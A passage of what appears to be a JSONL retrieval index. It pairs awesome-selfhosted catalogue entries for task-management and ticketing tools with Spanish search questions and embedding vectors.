0.04245, -0.09334, 0.02516, -0.06154, 0.06376, 0.01322, -0.00017, 0.13511, -0.01824, 0.02104, 0.01043, -0.06486, -0.04169, 0.03245, -0.04654, -0.03283, -0.05176, 0.0038, -0.06495, -0.01995, 0.01015, 0.00327, -0.04454, -0.04464, -0.0034, -0.00297, 0.01458, -0.05703, 0.03104, 0.09829, 0.01682, 0.06482, -0.09783, 0.01804, 0.06114, 0.11358, 0.01188, -0.02871, 0.0611, 0.01836, -0.04944, 0.01435, 0.03024, 0.0121, 0.11124, 0.01493, -0.02469, 0.00731, 0.02549, -0.01351, 0.03571, -0.07979, -0.00015, 0.0523, 0.0693, 0.02183, -0.0123, -0.00994, 0.03162, -0.04609, 0.01995, -0.03527, -0.0322, 0.02841, 0.04311, -0.04948, 0.02467, 0.09995, 0.01055, -0.01767, -0.01615, 0.06077, -0.03462, 0.02995, -0.04613, 0.00836, -0.02032, 0.02127, 0.04038, -0.01444, 0.0251, -0.01066]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: tududi β€” Task management tool with hierarchical structure, smart recurring tasks, and seamless Telegram integration [MIT, Docker]. Vikunja β€” The to-do app to organize your life [AGPL-3.0/GPL-3.0, Go]. Wekan β€” Open-source Trello-like kanban [MIT, Nodejs]. Will Be Done β€” Offline-first task manager with weekly planning, project boards, real-time sync, Vim keybindings, desktop quick add, and import from popular task managers (alternative to TickTick, Todoist) [AGPL-3.0, Docker/Nodejs].", "indexar": "ΒΏhay alguna alternativa libre a TickTick o Todoist que funcione sin internet?", "v": [-0.22745, 0.10539, -0.14373, 0.14562, 0.13192, -0.1497, -0.12648, -0.0474, -0.04048, 0.06792, 0.05756, -0.14605, 0.13984, 0.19333, 0.18092, -0.05688, 0.047, -0.18142, 0.21187, -0.1516, -0.05327, 0.03151, -0.05204, -0.05366, 0.08606, -0.13224, -0.03748, -0.00643, -0.15365, 0.02995, 0.05259, -0.00793, 0.0853, -0.00999, -0.02586, -0.06134, 0.16244, 0.09099, 0.17177, -0.00512, 0.0481, -0.04635, -0.05715, 0.04858, -0.04469, 0.06263, -0.04602, -0.06322, 0.08609, 0.0625, -0.0602, -0.04742, -0.03178, 0.02943, -0.03049, 0.0369, 0.09831, -0.0604, 0.09524, -0.0168, -0.08375, 0.01413, 0.05906, 0.00157, 0.09948, -0.00612, -0.01506, -0.02076, -0.00332, 0.13792, -0.00168, 0.00812, -0.05145, -0.04918, 0.04035, 0.06204, -0.02434, -0.02299, -0.01421, 0.01715, 0.02503, -0.00201, 0.02964, 0.00344, -0.09518, 0.00465, 0.05823, -0.15208, -0.00724, 0.03192, 0.03122, 0.04367, -0.05247, 0.09701, -0.02212, -0.06098, 0.0233, -0.00877, -0.007, -0.01484, 0.07826, 0.0588, -0.08808, 0.00895, -0.07488, 0.01292, 0.01738, -0.00997, -0.07779, -0.01933, 0.02007, -0.01317, -0.00798, -0.01694, 0.01021, -0.01163, -0.04767, 0.0165, -0.00973, -0.00513, -0.03839, 0.00503, 0.017, -0.03333, 0.05333, 0.05281, 0.03116, 0.06725, -0.07951, 0.01964, 0.05349, -0.07348, -0.0521, -0.14295, -0.08589, -0.04563, 0.05146, -0.01815, 0.04162, -0.03662, 0.00552, -0.0439, -0.05342, 0.03716, 0.01346, -0.03631, 0.03031, -0.01708, -0.08464, -0.00349, -0.06726, 0.03182, -0.0165, 0.02911, 0.01832, 0.01371, -0.01542, -0.05836, -0.00944, 0.01451, 0.00793, -0.03183, 0.0114, 0.01034, -0.0919, 0.06459, -0.04924, 0.07327, -0.10703, 0.03124, -0.00848, 0.04363, 0.02656, -0.09344, 0.02366, -0.04886, -0.02064, -0.02669, 0.03811, 0.01105, 0.0213, 0.02844, -0.0851, -0.00479, -0.03915, 0.00214, -0.01462, -0.02257, -0.04154, 0.01558, 0.00344, -0.03751, -0.07035, -0.04259, -0.00122, 0.01724, -0.01665, -0.0802, 0.02004, 0.00308, -0.05872, -0.05008, -0.01411, -0.01253, -0.01294, 0.02029, 0.04934, -0.01338, 0.0091, 0.06507, 0.01452, -0.05841, 0.02262, -0.03525, -0.03022, 0.02617, 0.06581, -0.04703, -0.05359, -0.04453, 0.00939, -0.04438, -0.01105, 0.1043, 0.04757, 0.0624, 0.04951, 0.01061, 0.0159, 0.00557, 0.0233, -0.00762, 0.00557, -0.01057, -0.06305, -0.04092, -0.01283, 0.02835, -0.04953, 0.0225, 0.01787, 0.0287, 0.02105, 0.01512, 0.01155, -0.02602, -0.07204, 0.00831, -0.01239, -0.0376, -0.04612, 0.06743, -0.02899, 0.00665, 0.03171, 0.05853]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: tududi β€” Task management tool with hierarchical structure, smart recurring tasks, and seamless Telegram integration [MIT, Docker]. Vikunja β€” The to-do app to organize your life [AGPL-3.0/GPL-3.0, Go]. Wekan β€” Open-source Trello-like kanban [MIT, Nodejs]. Will Be Done β€” Offline-first task manager with weekly planning, project boards, real-time sync, Vim keybindings, desktop quick add, and import from popular task managers (alternative to TickTick, Todoist) [AGPL-3.0, Docker/Nodejs].", "indexar": "ΒΏcual es una herramienta tipo Trello pero de cΓ³digo abierto para planificar proyectos?", "v": [0.01871, 0.00758, -0.16212, -0.15641, 0.00828, -0.22666, 0.03055, 0.04112, -0.03625, -0.10942, -0.1165, -0.09385, 0.07244, -0.13759, 0.12308, -0.01113, 0.08597, -0.15341, 0.09573, -0.02364, -0.10072, 0.00444, -0.19116, -0.03241, -0.10275, -0.09836, 0.00914, -0.03835, -0.20229, 0.03684, -0.00056, 0.02731, 0.15272, -0.02729, -0.00858, 0.04372, 0.14628, 0.12345, -0.01897, 0.07183, -0.07605, 0.00747, -0.05215, 0.08917, 0.03806, -0.05854, 0.02348, -0.00232, -0.02362, 0.07032, -0.10564, -0.08015, -0.0956, 0.01637, 0.07572, -0.03875, 0.16193, -0.08824, -0.10375, -0.06254, 0.0335, -0.06356, 0.02218, -0.10001, 0.01109, -0.09212, 0.04738, 0.0757, -0.09693, 0.0213, 0.00966, 0.04361, -0.03594, -0.06573, 0.08271, 0.03857, 0.07164, -0.01014, 0.03363, 0.07636, -0.01414, -0.00249, -0.01973, 0.03045, -0.0829, -0.04358, 0.003, -0.00518, 0.01567, -0.03508, 0.01687, 0.07336, -0.00844, 0.02327, 0.00296, -0.00594, 0.09197, 0.11391, 0.03541, 0.04254, 0.04025, -0.12355, -0.06172, 0.04283, 0.01626, 0.11017, 0.01617, 0.05389, -0.03194, 0.04745, -0.07705, 0.03123, -0.01869, -0.00783, -0.07489, -0.03694, -0.03997, -0.01595, 0.03509, -0.11547, -0.02073, 0.09447, -0.08497, 0.05825, -0.02114, 0.03856, -0.03448, 0.08841, -0.042, -0.0482, -0.05946, 0.01324, -0.09493, 0.04353, -0.04347, 0.01635, 0.07428, -0.06864, 0.05718, 0.03647, -0.04546, -0.05647, -0.01221, 0.00058, 0.00071, 0.04267, 0.04611, -0.01993, -0.04367, -0.01706, 0.00732, 0.04456, 0.04449, 0.01536, -0.10232, 0.03477, -0.00457, -0.0071, -0.08955, 0.09671, -0.09277, -0.0294, 0.02914, -0.04812, 0.02557, -0.07417, 0.03848, 0.02103, 0.08792, 0.0467, 0.09893, -0.03129, 0.12624, -0.03153, 0.02967, -0.12229, -0.01404, -0.04621, -0.05029, -0.07083, -0.0545, 0.05208, -0.00639, 0.00679, 0.02407, -0.02945, 0.0467, -0.03478, -0.01431, 0.02178, -0.00771, 0.00421, 0.0465, -0.05352, 0.06247, -0.01217, 0.04219, -0.01738, -0.01199, -0.01345, -0.03731, -0.001, 0.06766, -0.05442, -0.03642, 0.07282, -0.02267, 0.01781, -0.02035, 0.1007, 0.0799, -0.01479, 0.05591, -0.01495, 0.013, 0.02883, -0.05048, 0.06508, 0.06917, -0.01398, -0.01016, -0.02622, -0.00017, -0.03117, 0.05905, 0.00447, -0.01813, 0.01826, 0.00349, -0.00052, 0.03037, -0.03034, -0.00223, 0.0115, 0.01751, -0.0393, 0.04287, 0.00894, -0.03638, -0.04973, -0.00177, 0.03452, 0.01336, 0.0061, -0.01778, 0.00637, -0.01363, -0.04783, -0.04302, -0.05296, -0.03997, 0.05243, 0.0368, -0.0603, 0.01915, 0.01998]} -{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: BugPin β€” Visual bug reporting and ticketing tool for web applications [AGPL-3.0/MIT, Docker]. Bugzilla β€” General-purpose bugtracker and testing tool originally developed and used by the Mozilla project [MPL-2.0, Perl]. Frappe Helpdesk β€” Helpdesk software which helps you streamline your company's support, offers an easy setup, clean user interface, and automation tools to resolve customer queries efficiently [AGPL-3.0, Docker]. FreeScout β€” Email-based customer support application, help desk and shared mailbox (alternative to Zendesk and Help Scout) [AGPL-3.0, PHP/Docker]. GlitchTip β€” Error tracking app to collect errors reported by your app [MIT, Python/Docker/K8S]. ITFlow β€” Client IT documentation, ticketing, invoicing and accounting for MSPs (Managed Service Providers) [GPL-3.0, PHP]. Libredesk β€” Modern omnichannel customer support desk. Live chat, email, and more in a single binary [AGPL-3.0, Docker/Go/Nodejs]. MantisBT β€” Bug tracker, fits best for software development [GPL-2.0, PHP].", "indexar": "que herramienta sirve para reportar errores visualmente en aplicaciones web?", "v": [0.06638, 0.14412, -0.14251, -0.28978, 0.02733, -0.11559, -0.05802, -0.04652, 0.08223, -0.0479, -0.03627, -0.17134, -0.05887, -0.04595, 0.09309, 0.05838, 0.03986, -0.114, 0.03154, 0.00138, -0.0055, 0.04475, -0.1321, -0.03749, -0.12883, 0.10681, -0.02141, -0.04754, -0.11912, 0.01402, -0.05531, 0.01074, 0.07846, -0.06399, -0.2233, -0.0247, -0.03466, -0.04681, -0.07395, 0.06806, 0.06015, 0.06829, -0.06202, 0.03113, 0.02689, 0.02189, -0.00598, 0.01174, -0.0172, 0.10986, 0.00086, -0.10737, -0.06773, 0.0768, -0.01141, -0.11093, 0.20508, -0.13448, 0.06238, -0.12723, -0.10881, 0.0145, -0.02027, 0.00631, -0.02023, 0.00458, 0.02698, -0.01662, -0.10937, 0.06787, 0.01927, 0.05856, 0.08915, 0.02218, -0.00969, -0.01788, -0.02422, 0.00974, 0.03632, -0.02247, 0.03702, -0.03941, -0.10649, 0.05606, -0.07274, -0.06987, 0.06957, 0.00564, 0.06643, -0.10963, 0.01658, 0.10489, -0.04377, -0.02944, 0.0045, -0.06479, 0.13031, -0.08703, 0.05296, 0.06847, 0.10349, -0.12404, -0.03831, -0.06343, -0.07093, 0.01341, 0.02804, -0.0142, -0.09927, -0.0554, -0.02071, -0.06562, 0.00955, 0.04939, -0.02547, 0.03789, 0.02847, -0.06471, -0.01308, -0.05894, 0.01617, -0.06967, -0.06871, -0.04284, -0.04348, 0.01266, 0.00666, 0.11547, -0.02509, 0.00583, 0.01093, -0.06972, -0.08852, 0.08179, 0.00579, -0.00166, 0.05748, -0.08326, 0.03434, -0.01255, 0.00944, -0.00387, -0.01927, 0.00752, -0.00425, 0.02989, 0.05489, 0.01731, -0.05682, -0.00656, 0.02939, -0.04741, -0.06607, -0.02354, -0.06023, 0.0043, -0.09568, -0.04039, -0.06071, -0.01966, -0.088, -0.04338, 0.01958, 0.00949, 0.00418, -0.09953, 0.02215, 0.08783, 0.09659, 0.07015, 0.00623, 0.05488, 0.06145, -0.09275, 0.00826, -0.02357, -0.0319, 0.03082, -0.02426, -0.06153, -0.06293, -0.05884, -0.02871, 0.04943, 0.05977, -0.03135, 0.03372, -0.03762, -0.00278, 0.02853, -0.04099, 0.04769, 0.03711, -0.05343, 0.07987, 0.05449, 0.00315, -0.04093, 0.02368, -0.04161, -0.02057, -0.01908, -0.02447, -0.00268, 0.0362, 0.06722, 0.00924, 0.005, 0.0062, 0.05309, -0.01153, -0.02404, 0.03154, -0.03433, -0.00438, -0.07723, 0.05681, 0.07205, -0.08166, -0.02238, 0.00934, -0.09199, -0.03686, -0.01055, -0.0053, 0.03616, 0.01615, -0.04762, -0.036, -0.03109, 0.02538, -0.04147, -0.05307, -0.03843, -0.00754, -0.05531, 0.0335, 0.00309, -0.05144, -0.03855, -0.01441, 0.03094, 0.02745, -0.01511, -0.00547, -0.03563, 0.01084, 0.00356, -0.02548, -0.05, -0.05475, 0.02576, 0.05538, -0.01202, -0.02094, -0.03394]} -{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: BugPin β€” Visual bug reporting and ticketing tool for web applications [AGPL-3.0/MIT, Docker]. Bugzilla β€” General-purpose bugtracker and testing tool originally developed and used by the Mozilla project [MPL-2.0, Perl]. Frappe Helpdesk β€” Helpdesk software which helps you streamline your company's support, offers an easy setup, clean user interface, and automation tools to resolve customer queries efficiently [AGPL-3.0, Docker]. FreeScout β€” Email-based customer support application, help desk and shared mailbox (alternative to Zendesk and Help Scout) [AGPL-3.0, PHP/Docker]. GlitchTip β€” Error tracking app to collect errors reported by your app [MIT, Python/Docker/K8S]. ITFlow β€” Client IT documentation, ticketing, invoicing and accounting for MSPs (Managed Service Providers) [GPL-3.0, PHP]. Libredesk β€” Modern omnichannel customer support desk. Live chat, email, and more in a single binary [AGPL-3.0, Docker/Go/Nodejs]. MantisBT β€” Bug tracker, fits best for software development [GPL-2.0, PHP].", "indexar": "con que puedo montar un sistema de soporte al cliente con chat y correo?", "v": [0.01758, 0.07055, -0.16212, -0.14481, -0.18665, -0.08735, 0.02016, 0.03188, -0.15328, -0.10319, -0.15559, -0.08667, 0.09141, -0.03547, 0.03023, -0.00126, 0.01446, -0.08371, 0.05136, 0.01096, 0.06587, -0.0736, -0.04354, -0.09925, -0.09739, 0.16525, 0.08911, -0.0643, -0.06111, 0.12248, 0.05908, -0.06018, -0.04768, 0.09396, 0.0121, -0.10566, 0.0178, -0.03006, 0.03137, 0.0198, 0.05193, -0.13688, 0.04666, 0.0464, 0.10027, -0.0448, 0.03705, -0.05592, -0.0033, 0.03805, -0.03241, -0.16892, -0.14643, -0.02903, -0.03873, -0.03339, 0.16955, -0.07082, 0.10409, -0.10889, 0.00414, 0.13129, 0.0171, 0.09968, 0.02871, -0.00465, -0.04456, -0.04546, -0.13842, -0.00417, -0.01194, -0.01646, 0.04845, 0.0354, -0.0386, 0.07433, 0.00677, 0.04981, -0.01485, 0.02959, 0.00884, 0.03696, -0.07306, 0.11598, -0.00084, -0.04548, -0.02859, -0.0264, 0.00615, -0.04619, 0.07899, 0.0039, 0.04275, 0.05468, -0.00647, -0.12331, -0.06157, -0.00556, -0.06251, -0.00516, -0.05135, 0.00079, -0.09129, 0.10306, 0.00184, -0.09622, 0.10554, -0.09864, 0.0223, -0.04293, -0.01167, 0.05639, -0.06731, -0.02624, -0.06445, -0.15542, 0.02202, 0.01246, 0.02148, 0.02586, 0.04292, 0.14338, 0.06333, 0.03573, 0.04529, -0.03288, 0.05799, 0.08713, 0.00951, 0.01316, -0.03755, -0.00995, -0.0387, -0.02525, 0.07064, 0.0577, -0.00367, 0.07744, -0.02046, 0.01276, 0.01492, 0.01192, -0.02874, -0.10872, 0.10988, -0.00077, 0.03958, -0.14115, -0.03378, -0.04921, 0.04223, 0.1011, 0.03311, -0.01093, -0.05583, -0.05891, 0.0735, -0.06433, 0.09644, 0.04891, 0.02991, 0.04134, 0.03129, 0.04815, -0.01879, 0.01031, -0.0803, -0.01913, 0.07212, 0.04513, -0.02407, 0.02314, 0.12657, -0.03231, 0.02413, 0.02207, -0.01002, -0.03184, -0.01179, -0.03572, -0.062, -0.00251, 0.04787, 0.00687, -0.04655, 0.00603, -0.01975, 0.0271, 0.02623, 0.01372, 0.00501, 0.07077, -0.05416, 0.02318, -0.0253, -0.03454, -0.03511, 0.01463, -0.02102, 0.01355, -0.03459, 0.02811, 0.03643, -0.05854, -0.0288, 0.03119, -0.01088, 0.07968, 0.08283, 0.0563, 0.06, -0.02282, 0.06648, 0.00645, -0.03321, 0.03129, 0.01012, 0.03845, -0.02065, -0.02257, 0.01434, 0.00287, 0.0535, 0.08245, -0.02205, 0.00416, 0.01669, 0.03772, 0.00242, -0.00177, -0.00772, -0.08386, 0.02622, -0.02577, 0.04428, -0.01355, 0.07288, -0.04234, -0.05798, -0.02986, 0.04095, 0.05424, 0.00024, -0.0042, -0.0157, -0.02891, -0.10421, 0.01072, -0.05483, -0.06172, -0.03181, 0.03309, -0.03348, -0.07979, 0.00818, -0.01081]} -{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: BugPin β€” Visual bug reporting and ticketing tool for web applications [AGPL-3.0/MIT, Docker]. Bugzilla β€” General-purpose bugtracker and testing tool originally developed and used by the Mozilla project [MPL-2.0, Perl]. Frappe Helpdesk β€” Helpdesk software which helps you streamline your company's support, offers an easy setup, clean user interface, and automation tools to resolve customer queries efficiently [AGPL-3.0, Docker]. FreeScout β€” Email-based customer support application, help desk and shared mailbox (alternative to Zendesk and Help Scout) [AGPL-3.0, PHP/Docker]. GlitchTip β€” Error tracking app to collect errors reported by your app [MIT, Python/Docker/K8S]. ITFlow β€” Client IT documentation, ticketing, invoicing and accounting for MSPs (Managed Service Providers) [GPL-3.0, PHP]. Libredesk β€” Modern omnichannel customer support desk. Live chat, email, and more in a single binary [AGPL-3.0, Docker/Go/Nodejs]. MantisBT β€” Bug tracker, fits best for software development [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a Zendesk para gestionar tickets?", "v": [-0.15995, -0.03718, -0.18046, -0.15318, -0.03856, 0.02582, -0.18375, -0.02154, -0.09556, -0.02443, -0.0847, -0.16435, -0.15667, -0.03403, 0.14175, 0.02732, 0.11775, -0.06232, 0.19207, 0.00674, -0.06133, 0.05321, -0.00541, -0.05949, -0.03991, -0.03825, 0.08857, -0.08423, -0.14634, 0.05854, 0.00314, -0.1582, -0.04376, -0.04458, 0.08427, 0.05023, 0.18147, 0.13412, 0.10475, -0.02517, -0.10166, 0.07439, -0.08999, 0.14748, 0.05634, -0.0122, -0.00912, 0.04117, -0.03921, -0.02503, -0.07403, -0.03734, 0.00281, 0.0544, 0.1094, -0.09534, 0.00515, -0.11335, 0.03138, -0.03932, -0.08086, 0.0028, 0.00715, 0.01587, -0.02008, 0.0773, 0.00791, 0.01872, -0.0512, 0.05889, 0.00285, 0.0012, 0.09785, -0.01613, -0.00054, 0.00325, 0.0176, 0.01966, -0.03019, 0.0704, 0.05779, -0.01848, -0.03754, 0.03181, -0.00139, -0.0786, 0.04585, -0.06558, -0.05901, 0.08716, -0.03155, 0.00831, 3e-05, 0.03086, -0.02137, -0.06293, -0.02137, 0.00623, -0.05435, -0.00823, -0.00897, 0.03545, -0.10476, -0.02891, -0.07139, 0.04166, 0.03595, 0.00546, -0.06517, 0.05494, -0.0157, 0.06672, -0.03371, 0.08191, 0.01116, 0.01626, 0.05464, 0.03895, 0.07513, -0.00885, -0.01203, -0.06889, -0.02248, -0.18204, 0.05834, 0.04728, 0.03554, 0.09828, 0.00585, 0.02304, 0.06985, -0.03592, -0.06017, -0.04356, -0.10789, -0.05344, 0.05638, -0.01531, 0.05839, -0.03261, -0.0563, 0.04264, 0.04372, 0.00417, 0.09447, -0.05785, -0.0693, -0.02734, 0.06018, -0.0378, -0.0207, -0.01795, 0.00789, 0.12966, -0.04958, 0.0291, -0.06583, 0.01255, -0.1273, 0.05137, 0.00546, -0.01634, 0.00171, 0.07304, -0.04417, -0.0183, -0.00767, -0.01985, -0.08111, 0.04019, 0.03661, 0.08256, 0.09486, -0.02162, 0.08296, -0.09682, -0.01973, -0.11553, 0.06351, 0.00735, 0.06357, 0.01255, -0.03883, 0.03554, 0.0096, -0.02331, -0.02057, 0.01671, 0.05616, 0.0439, -0.00946, 0.00313, -0.0577, -0.08339, -0.00219, -0.05289, -0.02941, -0.05525, -0.06442, 0.00852, -0.0344, 0.01953, -0.00626, -0.03331, 0.05343, 0.02198, 0.00529, 0.05528, 0.05912, 0.02441, 0.05124, 0.01781, 0.09567, 0.00346, -0.05282, -0.03216, -0.00307, -0.01286, 0.04234, -0.0291, 0.01959, -0.0109, -0.01786, -0.04929, -0.0084, -0.02032, 0.02329, 0.03822, -0.02057, 0.02324, 0.01441, 0.02036, 0.06219, 0.06307, 0.01155, -0.02586, 0.04733, 0.00465, -0.01633, 0.0241, 0.02946, 0.09758, 0.02956, 0.03962, -0.06702, 0.00739, -0.10206, -0.01695, -0.02545, -0.0248, -0.0423, -0.01431, 0.01712, 0.05356, 0.03665, -0.02915]} -{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: OTOBO β€” Flexible web-based ticketing system used for customer service, help desk, IT service management [GPL-3.0, Perl/Docker]. Request Tracker β€” Enterprise-grade issue tracking system [GPL-2.0, Perl]. Roundup Issue Tracker β€” Simple-to-use and -install issue tracking system with command-line, web, REST, XML-RPC, and e-mail interfaces. Designed with flexibility in mind - not just another bug tracker [MIT/ZPL-2.0, Python/Docker]. Zammad β€” Easy to use but powerful open-source support and ticketing system [AGPL-3.0, Ruby/deb].", "indexar": "que programa es para gestionar tickets de servicio al cliente", "v": [-0.03287, 0.02051, -0.08354, -0.2636, -0.00673, -0.12625, -0.00399, 0.01397, -0.06512, -0.05401, -0.07032, -0.14408, 0.04054, -0.04279, 0.00725, -0.02414, 0.07876, -0.11455, 0.18813, 0.11333, -0.01623, 0.13989, 0.038, -0.01514, -0.12523, 0.03229, 0.14619, -0.12275, -0.04898, 0.07505, 0.03446, -0.18924, -0.04403, -0.14722, 0.14531, -0.04011, -0.02169, 0.08852, 0.03782, -0.02762, 0.02669, -0.07262, 0.00675, 0.05041, 0.09114, -0.07387, 0.08836, -0.03248, -0.00166, -0.00582, -0.06514, -0.10692, -0.10832, -0.00051, 0.08004, -0.04511, -0.09362, -0.17694, -0.05779, 0.01221, 0.03576, -0.01748, -0.01899, 0.07527, 0.0475, 0.0095, 0.15182, -0.00472, 0.00238, -0.01082, -0.1331, -0.0076, 0.03606, 0.04716, 0.02194, -0.01717, 0.0999, 0.03915, 0.02455, -0.02, 0.03836, 0.05944, -0.06668, 0.02586, -0.03318, 0.01529, 0.00927, -0.01353, -0.04399, 0.07831, 0.05401, 0.05888, 0.00922, 0.01674, 0.01726, -0.04534, 0.08762, -0.07855, -0.01839, 0.03486, -0.01045, 0.00768, -0.06166, 0.08784, -0.09254, 0.06838, 0.10209, -0.08474, -0.08171, 0.07037, -0.08562, -0.02026, -0.04589, -0.02015, -0.06041, -0.00514, 0.06508, -0.0069, 0.07795, 0.0232, -0.06979, 0.01918, 0.06703, -0.02984, 0.10755, 0.02237, -0.01835, 0.11366, 0.0215, -0.02864, -0.03152, 0.04664, -0.04506, 0.01741, -0.00845, -0.07116, 0.00803, -0.01143, 0.02614, -0.0328, -0.06237, 0.04759, 0.02686, 0.05583, 0.14934, -0.07163, 0.00684, -0.05053, 0.0109, 0.07116, 0.03371, -0.02018, -0.03646, 0.07763, -0.03868, -0.00519, -0.00306, -0.07589, -0.08574, 0.05151, -0.03771, -0.03218, 0.05044, 0.05082, 0.0699, -0.05026, -0.0391, 0.0416, 0.08575, 0.0612, -0.04618, 0.0316, 0.05792, -0.02863, 0.02876, -0.00355, -0.04214, -0.10432, 0.08053, 0.02517, -0.02253, -0.05282, 0.06168, 0.04813, -0.04726, -0.01394, -0.08629, 0.03286, 0.00141, -0.02017, 0.00794, -0.01093, -0.04055, 0.00495, 0.002, -0.05309, -0.05681, 0.0087, -0.07215, -0.0254, -0.0819, 0.00345, 0.04655, 0.01811, -0.00265, 0.06069, 0.04103, 0.06055, 0.06587, 0.05555, 0.01348, -0.03401, 0.0615, -0.02037, -0.04635, -0.03147, -0.00113, -0.00625, 0.06204, 0.0384, -0.01607, -0.04798, 0.00497, 0.03231, -0.04812, -0.09346, 0.04644, 0.03839, 0.0668, 0.02385, 0.00308, -0.03572, 0.02629, 0.00452, 0.04015, -0.03001, 0.08283, -0.08385, -0.03807, -0.04645, 0.02768, 0.09992, 0.00389, 0.00839, -0.01642, 0.04639, -0.07521, 0.00604, 0.01033, 0.02213, -0.00877, -0.00237, 0.00488, 0.01367, 0.06906, -0.01807]} -{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: OTOBO β€” Flexible web-based ticketing system used for customer service, help desk, IT service management [GPL-3.0, Perl/Docker]. Request Tracker β€” Enterprise-grade issue tracking system [GPL-2.0, Perl]. Roundup Issue Tracker β€” Simple-to-use and -install issue tracking system with command-line, web, REST, XML-RPC, and e-mail interfaces. Designed with flexibility in mind - not just another bug tracker [MIT/ZPL-2.0, Python/Docker]. Zammad β€” Easy to use but powerful open-source support and ticketing system [AGPL-3.0, Ruby/deb].", "indexar": "con que puedo montar un sistema de seguimiento de incidencias sin pagar licencias", "v": [0.16472, 0.1209, -0.18755, -0.1839, 0.00048, -0.10838, -0.06575, -0.01518, -0.20323, -0.05702, 0.03809, -0.07962, 0.09391, -0.05929, 0.11322, 0.10927, -0.04817, -0.13371, 0.00342, -0.01937, -0.02394, -0.00602, 0.02274, -0.03365, -0.00732, 0.0709, -0.0019, -0.19092, -0.18578, 0.04404, -0.0688, 0.07944, 0.09938, 0.01826, -0.03525, -0.03012, -0.01512, 0.08865, 0.16224, -0.09038, 0.08154, 0.01521, 0.01591, -0.08031, 0.01187, -0.1321, 0.00203, 0.06428, 0.03389, -0.12531, 0.00383, 0.02825, -0.10235, -0.11806, 0.00771, -0.07638, 0.0608, -0.03255, 0.06886, -0.05993, -0.00541, 0.0933, 0.03478, 0.05474, 0.01778, 0.03089, 0.10994, 0.00615, 0.04802, -0.02336, -0.04354, -0.10509, -0.01255, 0.02268, -0.03407, -0.01188, -0.02804, -0.11294, 0.01135, 0.09492, 0.03087, 0.03278, -0.01156, 0.01532, 0.00555, 0.05271, 0.00251, -0.08609, 0.05955, 0.01165, 0.03112, 0.08784, 0.03379, 0.0895, 0.03657, -0.06325, 0.06873, 0.05976, -0.08793, 0.0216, -0.06982, 0.07578, 0.0092, 0.00629, 0.0098, 0.03664, 0.12293, -0.08477, 0.0467, 0.02139, -0.00416, 0.10637, -0.10373, -0.0104, -0.06145, 0.01094, -0.01568, 0.0502, -0.01832, 0.05562, 0.00215, 0.05441, 0.05941, -0.07395, 0.11701, -0.02403, -0.00076, 0.18349, -0.08864, -0.01395, 0.03155, -0.04683, 0.00875, 0.05731, 0.03441, 0.03762, -0.05129, 0.03303, -0.11343, 0.06225, 0.03021, 0.04239, 0.04096, 0.02946, 0.06799, 0.05874, -0.02421, -0.11836, -0.04916, -0.05118, 0.01706, 0.06226, -0.01067, -0.00185, -0.01938, -0.00206, 0.04411, -0.02644, 0.08166, 0.0232, 0.07613, 0.09134, -0.02565, 0.03154, 0.00544, 0.03497, -0.0036, -0.01078, 0.07358, 0.03065, -0.04809, 0.01221, 0.03834, -0.02997, 0.08899, -0.01331, -0.06331, -0.09228, 0.01305, 0.03379, -0.10123, 0.05013, -0.0073, -0.02794, 0.01939, 0.0683, -0.05078, 0.08174, 0.01724, 0.05263, 0.04842, 0.04007, 0.02724, -0.00936, 0.02743, -0.01773, -0.03853, 0.02449, -0.05451, -0.01312, -0.04677, 0.05466, -0.02124, -0.02637, 0.02054, -0.03777, 0.01698, 0.1022, 0.06359, 0.04516, -0.02836, 0.01341, 0.00976, -0.02345, -0.05582, 0.0189, -0.03993, -0.04792, -0.02563, 0.00381, 0.09465, -0.00515, 0.0319, 0.05329, 0.02439, -0.02934, -0.0061, 0.05224, 0.01721, -0.01558, -0.03293, -0.02132, -0.04632, -0.02365, -0.00616, -0.02523, -0.02687, 0.00928, -0.03247, -0.01422, 0.01421, 0.07526, 0.07134, -0.02263, -0.04222, -0.06102, -0.0355, -0.04068, 0.01087, -0.04623, 0.00693, 0.0861, 0.01888, 0.00456, 0.0209, -0.03404]} -{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: OTOBO β€” Flexible web-based ticketing system used for customer service, help desk, IT service management [GPL-3.0, Perl/Docker]. Request Tracker β€” Enterprise-grade issue tracking system [GPL-2.0, Perl]. Roundup Issue Tracker β€” Simple-to-use and -install issue 